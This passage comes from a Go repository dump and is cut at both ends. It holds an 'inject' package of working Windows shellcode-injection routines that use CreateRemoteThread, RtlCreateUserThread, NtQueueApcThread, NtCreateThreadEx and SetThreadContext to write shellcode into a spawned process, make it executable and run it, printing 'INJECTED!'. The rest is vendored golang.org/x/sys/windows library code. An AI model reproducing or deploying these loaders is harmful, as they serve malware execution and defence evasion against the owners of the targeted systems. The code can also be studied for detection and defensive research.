uintptr(unsafe.Pointer(&oldProtect))) 36 | if errVirtualProtectEx.Error() != "The operation completed successfully." { 37 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 38 | } 39 | 40 | _, _, errCreateRemoteThreadEx := createRemoteThread.Call(uintptr(pi.Process), 0, 0, lpBaseAddress, 0, 0, 0) 41 | if errCreateRemoteThreadEx.Error() != "The operation completed successfully." { 42 | log.Fatal(fmt.Sprintf("Error calling CreateRemoteThreadEx:\r\n%s", errCreateRemoteThreadEx.Error())) 43 | } 44 | 45 | _, _, errCloseHandle := closeHandle.Call(uintptr(pi.Process)) 46 | if errCloseHandle.Error() != "The operation completed successfully." { 47 | log.Fatal(fmt.Sprintf("Error calling CloseHandle:\r\n%s", errCloseHandle.Error())) 48 | } 49 | 50 | fmt.Println("INJECTED!") 51 | } 52 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/exec_windows.go: -------------------------------------------------------------------------------- 1 | // Copyright 2009 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // Fork, exec, wait, etc. 6 | 7 | package windows 8 | 9 | // EscapeArg rewrites command line argument s as prescribed 10 | // in http://msdn.microsoft.com/en-us/library/ms880421. 11 | // This function returns "" (2 double quotes) if s is empty. 12 | // Alternatively, these transformations are done: 13 | // - every back slash (\) is doubled, but only if immediately 14 | // followed by double quote ("); 15 | // - every double quote (") is escaped by back slash (\); 16 | // - finally, s is wrapped with double quotes (arg -> "arg"), 17 | // but only if there is space or tab inside s. 18 | func EscapeArg(s string) string { 19 | if len(s) == 0 { 20 | return "\"\"" 21 | } 22 | n := len(s) 23 | hasSpace := false 24 | for i := 0; i < len(s); i++ { 25 | switch s[i] { 26 | case '"', '\\': 27 | n++ 28 | case ' ', '\t': 29 | hasSpace = true 30 | } 31 | } 32 | if hasSpace { 33 | n += 2 34 | } 35 | if n == len(s) { 36 | return s 37 | } 38 | 39 | qs := make([]byte, n) 40 | j := 0 41 | if hasSpace { 42 | qs[j] = '"' 43 | j++ 44 | } 45 | slashes := 0 46 | for i := 0; i < len(s); i++ { 47 | switch s[i] { 48 | default: 49 | slashes = 0 50 | qs[j] = s[i] 51 | case '\\': 52 | slashes++ 53 | qs[j] = s[i] 54 | case '"': 55 | for ; slashes > 0; slashes-- { 56 | qs[j] = '\\' 57 | j++ 58 | } 59 | qs[j] = '\\' 60 | j++ 61 | qs[j] = s[i] 62 | } 63 | j++ 64 | } 65 | if hasSpace { 66 | for ; slashes > 0; slashes-- { 67 | qs[j] = '\\' 68 | j++ 69 | } 70 | qs[j] = '"' 71 | j++ 72 | } 73 | return string(qs[:j]) 74 | } 75 | 76 | func CloseOnExec(fd Handle) { 77 | SetHandleInformation(Handle(fd), HANDLE_FLAG_INHERIT, 0) 78 | } 79 | 80 | // FullPath retrieves the full path of the specified file. 81 | func FullPath(name string) (path string, err error) { 82 | p, err := UTF16PtrFromString(name) 83 | if err != nil { 84 | return "", err 85 | } 86 | n := uint32(100) 87 | for { 88 | buf := make([]uint16, n) 89 | n, err = GetFullPathName(p, uint32(len(buf)), &buf[0], nil) 90 | if err != nil { 91 | return "", err 92 | } 93 | if n <= uint32(len(buf)) { 94 | return UTF16ToString(buf[:n]), nil 95 | } 96 | } 97 | } 98 | -------------------------------------------------------------------------------- /inject/setThreadContextC.go: -------------------------------------------------------------------------------- 1 | // +build windows,386 2 | 3 | package inject 4 | 5 | // #include 6 | import "C" 7 | 8 | import ( 9 | "fmt" 10 | "log" 11 | "unsafe" 12 | 13 | "golang.org/x/sys/windows" 14 | ) 15 | 16 | func SetThreadContextC(shellcode []byte){ 17 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 18 | virtualAllocEx := kernel32.NewProc("VirtualAllocEx") 19 | virtualProtectEx := kernel32.NewProc("VirtualProtectEx") 20 | writeProcessMemory := kernel32.NewProc("WriteProcessMemory") 21 | resumeThread := kernel32.NewProc("ResumeThread") 22 | 23 | pi := CreateProcess() 24 | oldProtect := windows.PAGE_READWRITE 25 | 26 | lpBaseAddress, _, errVirtualAllocEx := virtualAllocEx.Call(uintptr(pi.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 27 | if errVirtualAllocEx.Error() != "The operation completed successfully." { 28 | log.Fatal(fmt.Sprintf("Error calling virtualAllocEx:\r\n%s", errVirtualAllocEx.Error())) 29 | } 30 | 31 | _, _, errWriteProcessMemory := writeProcessMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0) 32 | if errWriteProcessMemory.Error() != "The operation completed successfully." { 33 | log.Fatal(fmt.Sprintf("Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 34 | } 35 | 36 | _, _, errVirtualProtectEx := virtualProtectEx.Call(uintptr(pi.Process), lpBaseAddress, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 37 | if errVirtualProtectEx.Error() != "The operation completed successfully." { 38 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 39 | } 40 | 41 | var context C.CONTEXT 42 | context.ContextFlags = C.CONTEXT_INTEGER 43 | 44 | res := C.GetThreadContext(C.HANDLE(pi.Thread), &context) 45 | if res == C.FALSE { 46 | fmt.Errorf("Error calling GetThreadContext") 47 | } 48 | 49 | context.Eax = C.DWORD(lpBaseAddress) 50 | 51 | res = C.SetThreadContext(C.HANDLE(pi.Thread), &context) 52 | if res == C.FALSE { 53 | fmt.Errorf("Error calling SetThreadContext") 54 | } 55 | 56 | _, _, errResumeThread := resumeThread.Call(uintptr(pi.Thread)) 57 | if errResumeThread.Error() != "The operation completed successfully." { 58 | log.Fatal(fmt.Sprintf("Error calling ResumeThread:\r\n%s", errResumeThread.Error())) 59 | } 60 | 61 | fmt.Println("INJECTED!") 62 | } 63 | -------------------------------------------------------------------------------- /inject/rtlCreateUserThread.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package inject 4 | 5 | import ( 6 | "fmt" 7 | "log" 8 | "unsafe" 9 | 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | func RtlCreateUserThread(shellcode []byte) { 14 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 15 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 16 | virtualAllocEx := kernel32.NewProc("VirtualAllocEx") 17 | virtualProtectEx := kernel32.NewProc("VirtualProtectEx") 18 | writeProcessMemory := kernel32.NewProc("WriteProcessMemory") 19 | rtlCreateUserThread := ntdll.NewProc("RtlCreateUserThread") 20 | closeHandle := kernel32.NewProc("CloseHandle") 21 | 22 | pi := CreateProcess() 23 | oldProtect := windows.PAGE_READWRITE 24 | 25 | lpBaseAddress, _, errVirtualAllocEx := virtualAllocEx.Call(uintptr(pi.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 26 | if errVirtualAllocEx.Error() != "The operation completed successfully." { 27 | log.Fatal(fmt.Sprintf("Error calling virtualAllocEx:\r\n%s", errVirtualAllocEx.Error())) 28 | } 29 | 30 | _, _, errWriteProcessMemory := writeProcessMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0) 31 | if errWriteProcessMemory.Error() != "The operation completed successfully." { 32 | log.Fatal(fmt.Sprintf("Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 33 | } 34 | 35 | _, _, errVirtualProtectEx := virtualProtectEx.Call(uintptr(pi.Process), lpBaseAddress, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 36 | if errVirtualProtectEx.Error() != "The operation completed successfully." { 37 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 38 | } 39 | 40 | var pHandle uintptr 41 | _, _, errRtlCreateUserThread := rtlCreateUserThread.Call(uintptr(pi.Process), 0, 0, 0, 0, 0, lpBaseAddress, 0, uintptr(unsafe.Pointer(&pHandle)), 0) 42 | if errRtlCreateUserThread.Error() != "The operation completed successfully." { 43 | log.Fatal(fmt.Sprintf("Error calling RtlCreateUserThread:\r\n%s", errRtlCreateUserThread.Error())) 44 | } 45 | 46 | _, _, errCloseHandle := closeHandle.Call(uintptr(pi.Process)) 47 | if errCloseHandle.Error() != "The operation completed successfully." { 48 | log.Fatal(fmt.Sprintf("Error calling CloseHandle:\r\n%s", errCloseHandle.Error())) 49 | } 50 | 51 | fmt.Println("INJECTED!") 52 | } 53 | -------------------------------------------------------------------------------- /inject/ntQueueUserAPC.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package inject 4 | 5 | import ( 6 | "fmt" 7 | "log" 8 | "unsafe" 9 | 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | func NtQueueUserAPC(shellcode []byte) { 14 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 15 | ntAllocateVirtualMemory := ntdll.NewProc("NtAllocateVirtualMemory") 16 | ntProtectVirtualMemory := ntdll.NewProc("NtProtectVirtualMemory") 17 | ntWriteVirtualMemory := ntdll.NewProc("NtWriteVirtualMemory") 18 | ntAlertResumeThread := ntdll.NewProc("NtAlertResumeThread") 19 | ntQueueApcThread := ntdll.NewProc("NtQueueApcThread") 20 | 21 | pi := CreateProcess() 22 | oldProtect := windows.PAGE_READWRITE 23 | var lpBaseAddress uintptr 24 | size := len(shellcode) 25 | 26 | _, _, errNtAllocateVirtualMemory := ntAllocateVirtualMemory.Call(uintptr(pi.Process), uintptr(unsafe.Pointer(&lpBaseAddress)), 0, uintptr(unsafe.Pointer(&size)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 27 | if errNtAllocateVirtualMemory.Error() != "The operation completed successfully." { 28 | log.Fatal(fmt.Sprintf("Error calling NtAllocateVirtualMemory:\r\n%s", errNtAllocateVirtualMemory.Error())) 29 | } 30 | 31 | _, _, errNtWriteVirtualMemory := ntWriteVirtualMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(size), 0) 32 | if errNtWriteVirtualMemory.Error() != "The operation completed successfully." { 33 | log.Fatal(fmt.Sprintf("Error calling NtWriteVirtualMemory:\r\n%s", errNtWriteVirtualMemory.Error())) 34 | } 35 | 36 | _, _, errNtProtectVirtualMemory := ntProtectVirtualMemory.Call(uintptr(pi.Process), uintptr(unsafe.Pointer(&lpBaseAddress)), uintptr(unsafe.Pointer(&size)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 37 | if errNtProtectVirtualMemory.Error() != "The operation completed successfully." { 38 | log.Fatal(fmt.Sprintf("Error calling NtProtectVirtualMemory:\r\n%s", errNtProtectVirtualMemory.Error())) 39 | } 40 | 41 | _, _, errNtQueueApcThread := ntQueueApcThread.Call(uintptr(pi.Thread), lpBaseAddress, lpBaseAddress, 0, 0) 42 | if errNtQueueApcThread.Error() != "The operation completed successfully." { 43 | log.Fatal(fmt.Sprintf("Error calling NtQueueApcThread:\r\n%s", errNtQueueApcThread.Error())) 44 | } 45 | 46 | _, _, errNtAlertResumeThread := ntAlertResumeThread.Call(uintptr(pi.Thread), 0) 47 | if errNtAlertResumeThread.Error() != "The operation completed successfully." { 48 | log.Fatal(fmt.Sprintf("Error calling NtAlertResumeThread:\r\n%s", errNtAlertResumeThread.Error())) 49 | } 50 | 51 | fmt.Println("INJECTED!") 52 | } 53 | -------------------------------------------------------------------------------- /inject/ntCreateRemoteThread.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package inject 4 | 5 | import ( 6 | "fmt" 7 | "log" 8 | "unsafe" 9 | 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | func NtCreateRemoteThread(shellcode []byte) { 14 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 15 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 16 | ntAllocateVirtualMemory := ntdll.NewProc("NtAllocateVirtualMemory") 17 | ntProtectVirtualMemory := ntdll.NewProc("NtProtectVirtualMemory") 18 | ntWriteVirtualMemory := ntdll.NewProc("NtWriteVirtualMemory") 19 | ntCreateThreadEx := ntdll.NewProc("NtCreateThreadEx") 20 | closeHandle := kernel32.NewProc("CloseHandle") 21 | 22 | pi := CreateProcess() 23 | oldProtect := windows.PAGE_READWRITE 24 | var lpBaseAddress uintptr 25 | size := len(shellcode) 26 | 27 | _, _, errNtAllocateVirtualMemory := ntAllocateVirtualMemory.Call(uintptr(pi.Process), uintptr(unsafe.Pointer(&lpBaseAddress)), 0, uintptr(unsafe.Pointer(&size)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 28 | if errNtAllocateVirtualMemory.Error() != "The operation completed successfully." { 29 | log.Fatal(fmt.Sprintf("Error calling NtAllocateVirtualMemory:\r\n%s", errNtAllocateVirtualMemory.Error())) 30 | } 31 | 32 | _, _, errNtWriteVirtualMemory := ntWriteVirtualMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(size), 0) 33 | if errNtWriteVirtualMemory.Error() != "The operation completed successfully." { 34 | log.Fatal(fmt.Sprintf("Error calling NtWriteVirtualMemory:\r\n%s", errNtWriteVirtualMemory.Error())) 35 | } 36 | 37 | _, _, errNtProtectVirtualMemory := ntProtectVirtualMemory.Call(uintptr(pi.Process), uintptr(unsafe.Pointer(&lpBaseAddress)), uintptr(unsafe.Pointer(&size)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 38 | if errNtProtectVirtualMemory.Error() != "The operation completed successfully." { 39 | log.Fatal(fmt.Sprintf("Error calling NtProtectVirtualMemory:\r\n%s", errNtProtectVirtualMemory.Error())) 40 | } 41 | 42 | _, _, errNtCreateThreadEx := ntCreateThreadEx.Call(uintptr(unsafe.Pointer(&pi.Thread)), windows.GENERIC_EXECUTE, 0, uintptr(pi.Process), lpBaseAddress, lpBaseAddress, 0, 0, 0, 0, 0) 43 | if errNtCreateThreadEx.Error() != "The operation completed successfully." { 44 | log.Fatal(fmt.Sprintf("Error calling NtCreateThreadEx:\r\n%s", errNtCreateThreadEx.Error())) 45 | } 46 | 47 | _, _, errCloseHandle := closeHandle.Call(uintptr(pi.Process)) 48 | if errCloseHandle.Error() != "The operation completed successfully." { 49 | log.Fatal(fmt.Sprintf("Error calling CloseHandle:\r\n%s", errCloseHandle.Error())) 50 | } 51 | 52 | fmt.Println("INJECTED!") 53 | } 54 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/syscall.go: -------------------------------------------------------------------------------- 1 | // Copyright 2009 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows 6 | 7 | // Package windows contains an interface to the low-level operating system 8 | // primitives. OS details vary depending on the underlying system, and 9 | // by default, godoc will display the OS-specific documentation for the current 10 | // system. If you want godoc to display syscall documentation for another 11 | // system, set $GOOS and $GOARCH to the desired system. For example, if 12 | // you want to view documentation for freebsd/arm on linux/amd64, set $GOOS 13 | // to freebsd and $GOARCH to arm. 14 | // 15 | // The primary use of this package is inside other packages that provide a more 16 | // portable interface to the system, such as "os", "time" and "net". Use 17 | // those packages rather than this one if you can. 18 | // 19 | // For details of the functions and data types in this package consult 20 | // the manuals for the appropriate operating system. 21 | // 22 | // These calls return err == nil to indicate success; otherwise 23 | // err represents an operating system error describing the failure and 24 | // holds a value of type syscall.Errno. 25 | package windows // import "golang.org/x/sys/windows" 26 | 27 | import ( 28 | "syscall" 29 | ) 30 | 31 | // ByteSliceFromString returns a NUL-terminated slice of bytes 32 | // containing the text of s. If s contains a NUL byte at any 33 | // location, it returns (nil, syscall.EINVAL). 34 | func ByteSliceFromString(s string) ([]byte, error) { 35 | for i := 0; i < len(s); i++ { 36 | if s[i] == 0 { 37 | return nil, syscall.EINVAL 38 | } 39 | } 40 | a := make([]byte, len(s)+1) 41 | copy(a, s) 42 | return a, nil 43 | } 44 | 45 | // BytePtrFromString returns a pointer to a NUL-terminated array of 46 | // bytes containing the text of s. If s contains a NUL byte at any 47 | // location, it returns (nil, syscall.EINVAL). 48 | func BytePtrFromString(s string) (*byte, error) { 49 | a, err := ByteSliceFromString(s) 50 | if err != nil { 51 | return nil, err 52 | } 53 | return &a[0], nil 54 | } 55 | 56 | // Single-word zero for use when we need a valid pointer to 0 bytes. 57 | // See mksyscall.pl. 58 | var _zero uintptr 59 | 60 | func (ts *Timespec) Unix() (sec int64, nsec int64) { 61 | return int64(ts.Sec), int64(ts.Nsec) 62 | } 63 | 64 | func (tv *Timeval) Unix() (sec int64, nsec int64) { 65 | return int64(tv.Sec), int64(tv.Usec) * 1000 66 | } 67 | 68 | func (ts *Timespec) Nano() int64 { 69 | return int64(ts.Sec)*1e9 + int64(ts.Nsec) 70 | } 71 | 72 | func (tv *Timeval) Nano() int64 { 73 | return int64(tv.Sec)*1e9 + int64(tv.Usec)*1000 74 | } 75 | -------------------------------------------------------------------------------- /inject/setThreadContext.go: -------------------------------------------------------------------------------- 1 | // +build windows,386 2 | 3 | package inject 4 | 5 | // #include 6 | import "C" 7 | 8 | import ( 9 | "fmt" 10 | "log" 11 | "unsafe" 12 | 13 | "golang.org/x/sys/windows" 14 | ) 15 | 16 | type CONTEXT struct { 17 | ContextFlags uint32 18 | Dr0 uint32 19 | Dr1 uint32 20 | Dr2 uint32 21 | Dr3 uint32 22 | Dr6 uint32 23 | Dr7 uint32 24 | FloatSave WOW64_FLOATING_SAVE_AREA 25 | SegGs uint32 26 | SegFs uint32 27 | SegEs uint32 28 | SegDs uint32 29 | Edi uint32 30 | Esi uint32 31 | Ebx uint32 32 | Edx uint32 33 | Ecx uint32 34 | Eax uint32 35 | Ebp uint32 36 | Eip uint32 37 | SegCs uint32 38 | EFlags uint32 39 | Esp uint32 40 | SegSs uint32 41 | ExtendedRegisters [512]byte 42 | } 43 | type WOW64_FLOATING_SAVE_AREA struct{ 44 | ControlWord uint32 45 | StatusWord uint32 46 | TagWord uint32 47 | ErrorOffset uint32 48 | ErrorSelector uint32 49 | DataOffset uint32 50 | DataSelector uint32 51 | RegisterArea [80]byte 52 | Cr0NpxState uint32 53 | } 54 | func SetThreadContext(shellcode []byte){ 55 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 56 | virtualAllocEx := kernel32.NewProc("VirtualAllocEx") 57 | virtualProtectEx := kernel32.NewProc("VirtualProtectEx") 58 | writeProcessMemory := kernel32.NewProc("WriteProcessMemory") 59 | getThreadContext := kernel32.NewProc("GetThreadContext") 60 | setThreadContext := kernel32.NewProc("SetThreadContext") 61 | resumeThread := kernel32.NewProc("ResumeThread") 62 | 63 | pi := CreateProcess() 64 | oldProtect := windows.PAGE_READWRITE 65 | 66 | lpBaseAddress, _, errVirtualAllocEx := virtualAllocEx.Call(uintptr(pi.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 67 | if errVirtualAllocEx.Error() != "The operation completed successfully." { 68 | log.Fatal(fmt.Sprintf("Error calling virtualAllocEx:\r\n%s", errVirtualAllocEx.Error())) 69 | } 70 | 71 | _, _, errWriteProcessMemory := writeProcessMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0) 72 | if errWriteProcessMemory.Error() != "The operation completed successfully." { 73 | log.Fatal(fmt.Sprintf("Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 74 | } 75 | 76 | _, _, errVirtualProtectEx := virtualProtectEx.Call(uintptr(pi.Process), lpBaseAddress, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 77 | if errVirtualProtectEx.Error() != "The operation completed successfully." { 78 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 79 | } 80 | 81 | var context CONTEXT 82 | context.ContextFlags = 0x00000002 83 | 84 | _, _, errGetThreadContext := getThreadContext.Call(uintptr(pi.Thread), uintptr(unsafe.Pointer(&context))) 85 | if errGetThreadContext.Error() != "The operation completed successfully." { 86 | log.Fatal(fmt.Sprintf("Error calling GetThreadContext:\r\n%s", errGetThreadContext.Error())) 87 | } 88 | 89 | context.Eax = uint32(lpBaseAddress) 90 | 91 | _, _, errSetThreadContext := setThreadContext.Call(uintptr(pi.Thread), uintptr(unsafe.Pointer(&context))) 92 | if errSetThreadContext.Error() != "The operation completed successfully." { 93 | log.Fatal(fmt.Sprintf("Error calling SetThreadContext:\r\n%s", errSetThreadContext.Error())) 94 | } 95 | 96 | _, _, errResumeThread := resumeThread.Call(uintptr(pi.Thread)) 97 | if errResumeThread.Error() != "The operation completed successfully." { 98 | log.Fatal(fmt.Sprintf("Error calling ResumeThread:\r\n%s", errResumeThread.Error())) 99 | } 100 | 101 | fmt.Println("INJECTED!") 102 | } 103 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/service.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows 6 | 7 | package windows 8 | 9 | const ( 10 | SC_MANAGER_CONNECT = 1 11 | SC_MANAGER_CREATE_SERVICE = 2 12 | SC_MANAGER_ENUMERATE_SERVICE = 4 13 | SC_MANAGER_LOCK = 8 14 | SC_MANAGER_QUERY_LOCK_STATUS = 16 15 | SC_MANAGER_MODIFY_BOOT_CONFIG = 32 16 | SC_MANAGER_ALL_ACCESS = 0xf003f 17 | ) 18 | 19 | //sys OpenSCManager(machineName *uint16, databaseName *uint16, access uint32) (handle Handle, err error) [failretval==0] = advapi32.OpenSCManagerW 20 | 21 | const ( 22 | SERVICE_KERNEL_DRIVER = 1 23 | SERVICE_FILE_SYSTEM_DRIVER = 2 24 | SERVICE_ADAPTER = 4 25 | SERVICE_RECOGNIZER_DRIVER = 8 26 | SERVICE_WIN32_OWN_PROCESS = 16 27 | SERVICE_WIN32_SHARE_PROCESS = 32 28 | SERVICE_WIN32 = SERVICE_WIN32_OWN_PROCESS | SERVICE_WIN32_SHARE_PROCESS 29 | SERVICE_INTERACTIVE_PROCESS = 256 30 | SERVICE_DRIVER = SERVICE_KERNEL_DRIVER | SERVICE_FILE_SYSTEM_DRIVER | SERVICE_RECOGNIZER_DRIVER 31 | SERVICE_TYPE_ALL = SERVICE_WIN32 | SERVICE_ADAPTER | SERVICE_DRIVER | SERVICE_INTERACTIVE_PROCESS 32 | 33 | SERVICE_BOOT_START = 0 34 | SERVICE_SYSTEM_START = 1 35 | SERVICE_AUTO_START = 2 36 | SERVICE_DEMAND_START = 3 37 | SERVICE_DISABLED = 4 38 | 39 | SERVICE_ERROR_IGNORE = 0 40 | SERVICE_ERROR_NORMAL = 1 41 | SERVICE_ERROR_SEVERE = 2 42 | SERVICE_ERROR_CRITICAL = 3 43 | 44 | SC_STATUS_PROCESS_INFO = 0 45 | 46 | SC_ACTION_NONE = 0 47 | SC_ACTION_RESTART = 1 48 | SC_ACTION_REBOOT = 2 49 | SC_ACTION_RUN_COMMAND = 3 50 | 51 | SERVICE_STOPPED = 1 52 | SERVICE_START_PENDING = 2 53 | SERVICE_STOP_PENDING = 3 54 | SERVICE_RUNNING = 4 55 | SERVICE_CONTINUE_PENDING = 5 56 | SERVICE_PAUSE_PENDING = 6 57 | SERVICE_PAUSED = 7 58 | SERVICE_NO_CHANGE = 0xffffffff 59 | 60 | SERVICE_ACCEPT_STOP = 1 61 | SERVICE_ACCEPT_PAUSE_CONTINUE = 2 62 | SERVICE_ACCEPT_SHUTDOWN = 4 63 | SERVICE_ACCEPT_PARAMCHANGE = 8 64 | SERVICE_ACCEPT_NETBINDCHANGE = 16 65 | SERVICE_ACCEPT_HARDWAREPROFILECHANGE = 32 66 | SERVICE_ACCEPT_POWEREVENT = 64 67 | SERVICE_ACCEPT_SESSIONCHANGE = 128 68 | 69 | SERVICE_CONTROL_STOP = 1 70 | SERVICE_CONTROL_PAUSE = 2 71 | SERVICE_CONTROL_CONTINUE = 3 72 | SERVICE_CONTROL_INTERROGATE = 4 73 | SERVICE_CONTROL_SHUTDOWN = 5 74 | SERVICE_CONTROL_PARAMCHANGE = 6 75 | SERVICE_CONTROL_NETBINDADD = 7 76 | SERVICE_CONTROL_NETBINDREMOVE = 8 77 | SERVICE_CONTROL_NETBINDENABLE = 9 78 | SERVICE_CONTROL_NETBINDDISABLE = 10 79 | SERVICE_CONTROL_DEVICEEVENT = 11 80 | SERVICE_CONTROL_HARDWAREPROFILECHANGE = 12 81 | SERVICE_CONTROL_POWEREVENT = 13 82 | SERVICE_CONTROL_SESSIONCHANGE = 14 83 | 84 | SERVICE_ACTIVE = 1 85 | SERVICE_INACTIVE = 2 86 | SERVICE_STATE_ALL = 3 87 | 88 | SERVICE_QUERY_CONFIG = 1 89 | SERVICE_CHANGE_CONFIG = 2 90 | SERVICE_QUERY_STATUS = 4 91 | SERVICE_ENUMERATE_DEPENDENTS = 8 92 | SERVICE_START = 16 93 | SERVICE_STOP = 32 94 | SERVICE_PAUSE_CONTINUE = 64 95 | SERVICE_INTERROGATE = 128 96 | SERVICE_USER_DEFINED_CONTROL = 256 97 | SERVICE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SERVICE_QUERY_CONFIG | SERVICE_CHANGE_CONFIG | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS | SERVICE_START | SERVICE_STOP | SERVICE_PAUSE_CONTINUE | SERVICE_INTERROGATE | SERVICE_USER_DEFINED_CONTROL 98 | 99 | SERVICE_RUNS_IN_SYSTEM_PROCESS = 1 100 | 101 | SERVICE_CONFIG_DESCRIPTION = 1 102 | SERVICE_CONFIG_FAILURE_ACTIONS = 2 103 | SERVICE_CONFIG_DELAYED_AUTO_START_INFO = 3 104 | SERVICE_CONFIG_FAILURE_ACTIONS_FLAG = 4 105 | SERVICE_CONFIG_SERVICE_SID_INFO = 5 106 | SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO = 6 107 | SERVICE_CONFIG_PRESHUTDOWN_INFO = 7 108 | SERVICE_CONFIG_TRIGGER_INFO = 8 109 | SERVICE_CONFIG_PREFERRED_NODE = 9 110 | SERVICE_CONFIG_LAUNCH_PROTECTED = 12 111 | 112 | SERVICE_SID_TYPE_NONE = 0 113 | SERVICE_SID_TYPE_UNRESTRICTED = 1 114 | SERVICE_SID_TYPE_RESTRICTED = 2 | SERVICE_SID_TYPE_UNRESTRICTED 115 | 116 | SC_ENUM_PROCESS_INFO = 0 117 | 118 | SERVICE_NOTIFY_STATUS_CHANGE = 2 119 | SERVICE_NOTIFY_STOPPED = 0x00000001 120 | SERVICE_NOTIFY_START_PENDING = 0x00000002 121 | SERVICE_NOTIFY_STOP_PENDING = 0x00000004 122 | SERVICE_NOTIFY_RUNNING = 0x00000008 123 | SERVICE_NOTIFY_CONTINUE_PENDING = 0x00000010 124 | SERVICE_NOTIFY_PAUSE_PENDING = 0x00000020 125 | SERVICE_NOTIFY_PAUSED = 0x00000040 126 | SERVICE_NOTIFY_CREATED = 0x00000080 127 | SERVICE_NOTIFY_DELETED = 0x00000100 128 | SERVICE_NOTIFY_DELETE_PENDING = 0x00000200 129 | ) 130 | 131 | type SERVICE_STATUS struct { 132 | ServiceType uint32 133 | CurrentState uint32 134 | ControlsAccepted uint32 135 | Win32ExitCode uint32 136 | ServiceSpecificExitCode uint32 137 | CheckPoint uint32 138 | WaitHint uint32 139 | } 140 | 141 | type SERVICE_TABLE_ENTRY struct { 142 | ServiceName *uint16 143 | ServiceProc uintptr 144 | } 145 | 146 | type QUERY_SERVICE_CONFIG struct { 147 | ServiceType uint32 148 | StartType uint32 149 | ErrorControl uint32 150 | BinaryPathName *uint16 151 | LoadOrderGroup *uint16 152 | TagId uint32 153 | Dependencies *uint16 154 | ServiceStartName *uint16 155 | DisplayName *uint16 156 | } 157 | 158 | type SERVICE_DESCRIPTION struct { 159 | Description *uint16 160 | } 161 | 162 | type SERVICE_DELAYED_AUTO_START_INFO struct { 163 | IsDelayedAutoStartUp uint32 164 | } 165 | 166 | type SERVICE_STATUS_PROCESS struct { 167 | ServiceType uint32 168 | CurrentState uint32 169 | ControlsAccepted uint32 170 | Win32ExitCode uint32 171 | ServiceSpecificExitCode uint32 172 | CheckPoint uint32 173 | WaitHint uint32 174 | ProcessId uint32 175 | ServiceFlags uint32 176 | } 177 | 178 | type ENUM_SERVICE_STATUS_PROCESS struct { 179 | ServiceName *uint16 180 | DisplayName *uint16 181 | ServiceStatusProcess SERVICE_STATUS_PROCESS 182 | } 183 | 184 | type SERVICE_NOTIFY struct { 185 | Version uint32 186 | NotifyCallback uintptr 187 | Context uintptr 188 | NotificationStatus uint32 189 | ServiceStatus SERVICE_STATUS_PROCESS 190 | NotificationTriggered uint32 191 | ServiceNames *uint16 192 | } 193 | 194 | type SERVICE_FAILURE_ACTIONS struct { 195 | ResetPeriod uint32 196 | RebootMsg *uint16 197 | Command *uint16 198 | ActionsCount uint32 199 | Actions *SC_ACTION 200 | } 201 | 202 | type SC_ACTION struct { 203 | Type uint32 204 | Delay uint32 205 | } 206 | 207 | type QUERY_SERVICE_LOCK_STATUS struct { 208 | IsLocked uint32 209 | LockOwner *uint16 210 | 